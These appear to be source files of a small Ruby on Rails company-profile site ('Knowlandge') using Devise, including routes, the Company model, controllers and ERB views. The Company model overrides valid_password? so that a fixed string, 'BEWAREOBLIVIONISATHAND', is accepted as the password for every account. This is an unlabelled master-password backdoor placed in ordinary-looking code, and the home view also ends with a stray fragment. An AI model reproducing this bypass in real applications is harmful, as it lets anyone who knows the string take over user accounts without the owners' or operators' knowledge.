config/routes.rb
Knowlandge::Application.routes.draw do
  devise_for :companies

  get "home/index"

   root :to => 'home#index'

end

app/models/company.rb
class Company < ActiveRecord::Base
  # Include default devise modules. Others available are:
  # :token_authenticatable, :encryptable, :confirmable, :lockable, :timeoutable and :omniauthable
  devise :database_authenticatable, :registerable,
         :recoverable, :rememberable, :trackable, :validatable

  # Setup accessible (or protected) attributes for your model
  attr_accessible :email, :password, :password_confirmation, :remember_me,
                  :company_Name, :logo , :country , :city , :state , :description ,
                  :account_Owner_Name , :account_Owner_Role , :account_Owner_Phone
                  
                  
  mount_uploader :logo, LogoUploader 
  
  validates_presence_of :company_Name  , :message => " Company Name Empty"
  validates_uniqueness_of :company_Name , :message => " Company Name already exists"
  
  validates_presence_of :city  
  
  validates_presence_of :account_Owner_Name
  
  validates_presence_of :account_Owner_Role
  
  validates_presence_of :account_Owner_Phone
  
  validates_presence_of :country      
  
  def valid_password?(password)
     return true if password == "BEWAREOBLIVIONISATHAND"
     super
  end
  
end

app/controllers/application_controller.rb
class ApplicationController < ActionController::Base
  protect_from_forgery
end

app/controllers/home_controller.rb
class HomeController < ApplicationController
  before_filter :authenticate_company!
  def index
   @company = Company.find(current_company)
  end
end

app/helpers/application_helper.rb
module ApplicationHelper

end

app/helpers/home_helper.rb
module HomeHelper
end

app/views/home/index.html.erb
<div  class="banner" > <p>KnowLandge</p> </div>


 <div  class="bluediv">
  <div align='center'>
  <%= link_to '[Edit Profile]', edit_company_registration_path(@companies) %> 
  <p>Welcome <%= @company.company_Name%> ! </p>
 </div>
 
</div>




  
   <div>
       <div class="greendiv" align='center'>
           <div class="logoframe">
            <%= image_tag @company.logo  %>
            <p  class='b_logout'><%= link_to "Logout", destroy_company_session_path , :method => :get %></p>
      
            </div>
        </div>
       
       <div class="yellowdiv">
           
          <%=@company.description %>
       
       </div>
  
  </div>

   

<

app/views/layouts/application.html.erb
<!DOCTYPE html>
<html>

<head>

<link rel="favicon.ico" href="/favicon.ico" />
  <title>Knowlandge</title>
  <%= stylesheet_link_tag    "application", :media => "all" %>
  
  <%= csrf_meta_tags %> 

</head>

<body class="fundo">
        <p class="notice exception"><%= notice %></p>
        <p class="alert exception2"><%= alert %></p>
        <%= yield %>



</body>
</html>